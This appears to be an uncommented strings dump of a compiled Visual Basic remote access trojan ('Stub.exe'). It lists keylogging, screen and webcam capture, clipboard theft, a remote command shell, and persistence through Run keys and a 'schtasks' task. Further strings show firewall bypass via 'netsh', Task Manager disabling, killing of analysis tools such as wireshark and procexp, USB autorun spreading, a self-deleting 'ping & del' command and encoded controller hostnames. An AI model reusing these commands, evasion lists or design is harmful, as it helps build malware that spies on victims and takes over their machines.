!This program cannot be run in DOS mode.
`.reloc
@wKA[#
(8
v2.0.50727
#Strings
<Module>
System.Reflection
AssemblyProductAttribute
AssemblyTitleAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
AssemblyFileVersionAttribute
System.Runtime.InteropServices
GuidAttribute
ComVisibleAttribute
AssemblyTrademarkAttribute
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
System.CodeDom.Compiler
GeneratedCodeAttribute
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.Diagnostics
DebuggerNonUserCodeAttribute
Microsoft.VisualBasic.Devices
Computer
DebuggerHiddenAttribute
System
Object
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
Microsoft.VisualBasic
HideModuleNameAttribute
MyGroupCollectionAttribute
RuntimeHelpers
GetObjectValue
Equals
GetHashCode
RuntimeTypeHandle
GetTypeFromHandle
ToString
Activator
CreateInstance
CompilerGeneratedAttribute
ThreadStaticAttribute
m_ThreadStaticValue
get_GetInstance
System.ComponentModel.Design
HelpKeywordAttribute
System.Timers
ElapsedEventArgs
Process
Conversions
ToBoolean
GetProcessesByName
ElapsedEventHandler
add_Elapsed
set_Enabled
MulticastDelegate
IAsyncResult
AsyncCallback
System.Collections.Generic
List`1
System.Text
StringBuilder
IntPtr
op_Explicit
System.Threading
Thread
ToInt32
get_Capacity
GetProcessById
get_ProcessName
String
ToLower
Operators
CompareString
Strings
Remove
get_Count
get_Item
Monitor
ToArray
Encoding
get_Default
GetString
System.IO
MemoryStream
CompareMethod
get_Length
Stream
Dispose
get_UTF8
GetBytes
Convert
ToBase64String
FromBase64String
ReadAllText
Exception
op_Equality
StrDup
get_MainWindowTitle
ProjectData
SetProjectError
ClearProjectError
System.Net.Sockets
TcpClient
FileStream
FileInfo
Assembly
GetEntryAssembly
get_Location
Microsoft.Win32
SessionEndingEventArgs
DirectoryInfo
get_Name
get_Directory
get_Parent
set_ReceiveBufferSize
set_SendBufferSize
Socket
get_Client
set_SendTimeout
set_ReceiveTimeout
ToInteger
Connect
ConditionalCompareObjectEqual
Concat
Microsoft.VisualBasic.MyServices
RegistryProxy
ServerComputer
get_Registry
RegistryKey
get_CurrentUser
OpenSubKey
DeleteValue
GetValue
System.Collections
IEnumerator
Interaction
GetObject
Boolean
NewLateBinding
LateGet
IEnumerable
GetEnumerator
get_Current
MoveNext
IDisposable
Environ
Conversion
System.IO.Compression
GZipStream
CompressionMode
LateCall
ChangeType
LateSet
SubtractObject
BitConverter
CreateProjectError
LateSetComplex
Registry
CurrentUser
SetValue
ComputerInfo
get_Info
get_TotalPhysicalMemory
Double
System.Globalization
CultureInfo
get_CurrentCulture
get_EnglishName
IndexOf
LastIndexOf
Substring
DateTime
FileSystemInfo
get_LastWriteTime
SocketFlags
ConditionalCompareObjectGreaterEqual
DivideObject
Format
ConditionalCompareObjectLess
ConcatenateObject
System.Drawing
Bitmap
Rectangle
System.Windows.Forms
Screen
get_PrimaryScreen
get_Bounds
get_Width
get_Height
System.Drawing.Imaging
PixelFormat
Graphics
FromImage
get_Size
CopyPixelOperation
CopyFromScreen
get_ClassesRoot
StartsWith
Replace
get_LocalMachine
get_Users
GetDirectories
DriveInfo
GetDrives
get_IsReady
get_TotalSize
GetFiles
Environment
get_MachineName
get_UserName
System.Net
WebClient
TextBox
System.Net.NetworkInformation
TcpConnectionInformation
IPGlobalProperties
ImageConverter
StreamWriter
MessageBoxButtons
MessageBoxIcon
ToDate
DateAndTime
set_TimeOfDay
CreateObject
MsgBoxResult
MsgBoxStyle
MsgBox
FileSystemProxy
get_FileSystem
SpecialDirectoriesProxy
get_SpecialDirectories
get_ProgramFiles
Directory
GetLogicalDrives
Application
get_ExecutablePath
FileAttributes
SetAttributes
SpecialFolder
GetFolderPath
get_FullName
FileMode
Exists
Delete
AppWinStyle
ClipboardProxy
get_Clipboard
SetText
GetTempPath
DataReceivedEventHandler
add_OutputDataReceived
add_ErrorDataReceived
EventArgs
EventHandler
add_Exited
ProcessWindowStyle
GetText
Clipboard
GetProcesses
get_Id
ProcessModule
get_MainModule
get_FileName
get_PrivateMemorySize64
get_StartTime
GetCurrentProcess
get_Handle
set_Text
get_Text
DoEvents
GetValueNames
AddObject
LocalMachine
GetFileName
get_RootDirectory
WriteAllText
ReadAllBytes
RenameDirectory
RenameFile
GetFileInfo
WriteAllBytes
GetIPGlobalProperties
GetActiveTcpConnections
IPEndPoint
get_LocalEndPoint
get_RemoteEndPoint
TcpState
get_State
GetSubKeyNames
GetAttributes
NetworkInterface
GetAllNetworkInterfaces
PhysicalAddress
GetPhysicalAddress
SystemInformation
get_ComputerName
get_UserDomainName
get_MonitorCount
get_VirtualScreen
get_OSFullName
get_OSPlatform
get_OSVersion
UInt64
PowerStatus
get_PowerStatus
BatteryChargeStatus
get_BatteryChargeStatus
get_BatteryLifePercent
get_TickCount
get_Clock
get_LocalTime
get_SystemDirectory
get_InstalledUICulture
GetEnvironmentVariable
GetType
TypeConverter
ConvertTo
TextWriter
WriteLine
Network
get_Network
get_Audio
AudioPlayMode
System.Media
SystemSound
SystemSounds
get_Asterisk
PlaySystemSound
DialogResult
MessageBox
RegistryValueKind
get_Chars
DownloadData
GetTempFileName
get_Message
CompareObjectEqual
OrObject
Cursor
get_Position
Cursors
DrawImage
ImageFormat
get_Jpeg
WriteByte
EndApp
get_Date
OperatingSystem
get_ServicePack
Contains
RegistryKeyPermissionCheck
CreateSubKey
EnvironmentVariableTarget
SetEnvironmentVariable
ToDouble
ThreadStart
DownloadFile
get_Temp
get_Today
get_Day
Command
SessionEndingEventHandler
SystemEvents
add_SessionEnding
set_MinWorkingSet
ConditionalCompareObjectNotEqual
System.Security.Cryptography
MD5CryptoServiceProvider
HashAlgorithm
ComputeHash
Module
GetModules
GetTypes
EndsWith
get_Assembly
get_Available
SelectMode
NetworkStream
GetStream
ReadByte
ToLong
Receive
ParameterizedThreadStart
DeleteSubKey
set_Position
DebuggerStepThroughAttribute
Keyboard
get_Keyboard
get_CapsLock
STAThreadAttribute
get_Now
get_TimeString
Stub.exe
user32.dll
user32
avicap32.dll
winmm.dll
KERNEL32.DLL
Kernel32.dll
mscorlib
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
CsAntiProcess
Fransesco
AntiTaskManager
EnumWindProc
EnumChildWindProc
GetWindowCmd
m_ComputerObjectProvider
m_AppObjectProvider
m_UserObjectProvider
m_MyWebServicesObjectProvider
.cctor
get_Computer
get_Application
get_User
get_WebServices
Create__Instance__
instance
Dispose__Instance__
_timer
Handler
sender
SWP_HIDEWINDOW
SWP_SHOWWINDOW
SPI_SETDESKWALLPAPER
SPIF_UPDATEINIFILE
SWP_HIDEWINDOW_
SWP_SHOWWINDOW_
SETDESKWALLPAPER
UPDATEINIFILE
lastcap
Lambda1
Lambda2
capGetDriverDescriptionA
wDriver
lpszName
cbName
lpszVer
CompDir
connect
GetForegroundWindow
GetVolumeInformation
lpRootPathName
lpVolumeNameBuffer
nVolumeNameSize
lpVolumeSerialNumber
lpMaximumComponentLength
lpFileSystemFlags
lpFileSystemNameBuffer
nFileSystemNameSize
GetWindowText
WinTitle
MaxLength
GetWindowTextLength
IconsToggle
FindWindowEx
FindWindowExA
HideTaskbarItems
ShowTaskbarItems
hideclock
showclock
AddHome
_FindWindow_
FindWindowA
lpClassName
lpWindowName
_SetWindowPos
hWndInsertAfter
wFlags
_SendMessage
wParam
lparam
_SystemParametersInfo
SystemParametersInfoA
uAction
uParam
lpvParam
fuWinIni
FindWindow_
SetWindowPos_
SendMessage_
ImHere
countrys
SetBytes
CaptureDesktop
GetKey
SendMessage
mciSendString_
mciSendStringA
ReturnString
ReturnLength
mmciSendString
lpstrCommand
lpstrReturnString
uReturnLength
hwndCallback
SetWindowPos
mciSendString
lpCommandString
lpReturnString
SwapMouseButton
SystemParametersInfo
GetPastas
location
GetDiscos
GetArquivos
RegValueGet
RegValueSet
values
MeuNome
NtSuspendProcess
NtResumeProcess
BlockInput_
fBlock
BlockInput_1
BlockInput
LORDDecrypt_
ParmDec
CriarChaveHKEYUSER
CaminhoExE
Escolher
LORDDecrypt
NtSetInformationProcess
hProcess
processInformationClass
processInformation
processInformationLength
Plugin
ShowCursor
_Lambda$__1
EnableWindow
bEnable
GetWindowThreadProcessId
lpdwProcessID
GetClassName
GetClassNameA
nMaxCount
SendMessageA
lParam
lpString
EnumChildWindows
lpEnumFunc
EnumChild
protect
GetChild
TargetObject
TargetMethod
BeginInvoke
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
Invoke
mouse_event
dwFlags
cButtons
dwExtraInfo
readtext
GetWindowTextA
GetWindowTextLengthA
FindWindow
GetWindow
IsWindowVisible
ShowWindow
nCmdShow
value__
Normal
ShowMinimized
ShowMaximized
ShowNoActivate
Minimize
ShowMinNoActive
ShowNA
Restore
ShowDefault
ForceMinimize
GW_HWNDFIRST
GW_HWNDLAST
GW_HWNDNEXT
GW_HWNDPREV
GW_OWNER
GW_CHILD
GW_ENABLEDPOPUP
infect
GetAsyncKeyState
RegisterServiceProcess
dwProcessId
dwType
timx_run
timy_run
WebServices
GetInstance
MyTemplate
8.0.0.0
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
My.Computer
My.Application
My.User
My.WebServices
2016 -2017
Windows
WrapNonExceptionThrows
1.0.0.0
$efe9eadc-d4ae-4b9e-b8ab-7e47f8db6ac9
_CorExeMain
mscoree.dll
AOZbipw
SHwmsqrgkzvjdlxiu
processhacker
procexp
SbieCtrl
SpyTheSpy
wireshark
apateDNS
IPBlocker
TiGeR-Firewall
smsniff
NetSnifferCs
Sandboxie Control
taskmgr
msconfig
CodeReflect
Reflector
MegaDumper
process explorer
button
static
directuihwnd
[endof]
server.exe
NS50Y3AuZXUubmdyb2suaW8Strik
Windows to Erorr
Windows Erorr
Microsoft Corporation
Windows Update
Explower
Notepad.exe
Java Update
Adobe Update
system
SoftwareMicrosoftWindowsCurrentVersionRun
[Software\Microsoft\Windows\CurrentVersion\Run]
MTI4NTE=
5a817464bd4e5e66666a802f2835ac0c
Software\Microsoft\Windows\CurrentVersion\Run
T2JlbWU=
Software\
Select * From AntiVirusProduct
winmgmts:\\.\root\SecurityCenter2
ExecQuery
displayName
Couldn
t detect AV
SystemDrive
Dispose
Position
Length
ProgMan
Shell_TrayWnd
ReBarWindow32
TrayNotifyWnd
TrayClockWClass
Software\Microsoft\Internet Explorer\Main
Start Page
##.#GB
dd-MM-yyyy
00-00-0000
ToArray
0,00 KB
%DIRET%%|%
%DIISC%%|%
%FILESS%%|%
Registry
CurrentUser
CreateSubKey
Software\ShortCutInfection
GetValue
error < Not Found >
SetValue
TextToSpeech
SAPI.Spvoice
!~ Hacker ~!
System
netsh firewall delete allowedprogram "
netsh firewall add allowedprogram "
" ENABLE
form10
DeMon2
\FransescoPast.txt
StartInfo
RedirectStandardOutput
RedirectStandardInput
RedirectStandardError
FileName
cmd.exe
UseShellExecute
CreateNoWindow
WindowStyle
EnableRaisingEvents
BeginErrorReadLine
BeginOutputReadLine
StandardInput
WriteLine
rundll32.exe shell32.dll,Control_RunDLL
EnviarServidorChamaFormClipboard
FormClipboard
MeuTextoClipboard
TextoClipboard
NovoClipboard
ExcluirClipboard
IconsON
IconsOFF
Denger
\output.txt
C:\WINDOWS\system32\drivers\etc\hosts
EnviarPermisaoGerenciador
ChamaFormGerenciadorTareefeas
PegarProcessos
ProcessSplit
ChamaListProcesss
FinalizarProcesss
form12
ResumerrProcesss
SuspenderProcesss
RestarttProcesss
PermisaoStartUpp
ChamaFrmStartUpsss
EnviarStartupsssa
Software\Microsoft\Windows\CurrentVersion\Run\
%CU_RUN%.|.
Software\Microsoft\Windows\CurrentVersion\RunOnce\
%CU_ONCE%.|.
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
%CU_EXPLO%.|.
%MA_RUN%.|.
%MA_ONCE%.|.
%MA_EXPLO%.|.
%FOLD_UP%.|.
EnviarStartupDadoss
ExcluirKeyyy
DeleteValue
ExcluirArquivoStartUp
spreading
Windows Update.exe
OpenPage
BlocKPage
127.0.0.1
Restart
PermisaoGerenciadorMineee
ChamaFrmGerenciadorr
|DiscosG|
EnviarResultadoGerenciadorrr
|DesktopG|
|ArProgramasG|
|DocumentosG|
|DownloadsG|
C:\Users\
\Downloads
|ImagensG|
|MusicasG|
|VideosG|
\Videos
|AtualizarG|
|NavegarG|
|InicializarG|
|WindowsG|
C:\Windows
|SistemaG|
|VisualizarG|
ChamaFrmVisualizar
|RenomearPastaG|
|RenomearArquivoG|
|ExcluirPastaG|
|ExcluirArquivoG|
|BaixarArquivoG|
EnviarBaixaArquivoG
|EnviarArquivoMineG|
Permisaoconesaosss
ChamaFrmConexaoo
EnviarConxaoooodd
{0}|{1}|{2}
EnviarDadosConexaooo
PermisaoGJanelas
EnviarPermitirForm
EnviarJanelasFf
EnviarPermitirFormJanelas
PrimsaoFormProgramas
ChamaFormProgramas
EnviarListaProgramas
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
DisplayName
LiiiistaProgramas
DesinsTalarProgramass
Software\Microsoft\Windows\CurrentVersion\Uninstall
UninstallString
EnviarPermisaoDeInfomacaoParaServidor
ChamaFormInformacao
TextoInformacoes
127.0.0.1
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
ProcessorNameString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winsat
PrimaryAdapterString
Dias,
Horas,
Minutos,
Segundos.
Identifier
PROCESSOR_ARCHITECTURE
-based PC
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS
SystemProductName
BIOSVendor
BIOSVersion
BIOSReleaseDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
RegisteredOrganization
ProductId
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile
EnableFirewall
Desativado
Ativado
EnviaResultadoInformacoes
infoDesk
oadaee
IEhome
script
\tempxxSD
ssstui
sendfile
atHTTP
atstop
EsconderBarraDeTarefas
Shell_traywnd
MostrarBarraDeTarefas
MonitorON
MonitorOFF
opencd
set cdaudio door open
closecd
set cdaudio door closed
Shutdown -l
Shutdown -r
Shutdown -s
sendmusicplay
NormalMouse
ReverseMouse
errorsound
ClockOFF
ClockON
TaskbarShow
TaskbarHide
EnviarPermisaaaoMensagem
ChamaFrmMensagemms
EnviarMensagemFakker
fransesco
getvalue
ctraik
Execute ERROR
Download ERROR
Executed As
Execute ERROR
Update ERROR
Updating To
Update ERROR
yy-MM-dd
??-??-??
Microsoft
Windows
SEE_MASK_NOZONECHECKS
Software\Microsoft\Windows\CurrentVersion\Policies\System
DisableTaskMgr
/Explorer.exe
\Microsoft\svchost.exe
melt.txt
/StUpdate.exe
schtasks /create /sc minute /mo 1 /tn StUpdate /tr
FRANSESCO
aGFraW0z*i5kZG5zLm5ldA!!
Software
cmd.exe /c ping 0 -n 2 & del "
Umbrella.flv.exe
\autorun.inf
[autorun]
shellexecute=
autorun.inf
yy/MM/dd
[Back]
[shift]
[ctrl]
[pause]
[home]
[left]
[right]
[down]
[insert]
[Delete]
[NumLock]
[ScrollLock]
[PrintScreen]
[PageUp]
[Pagedown]
[Ctrl]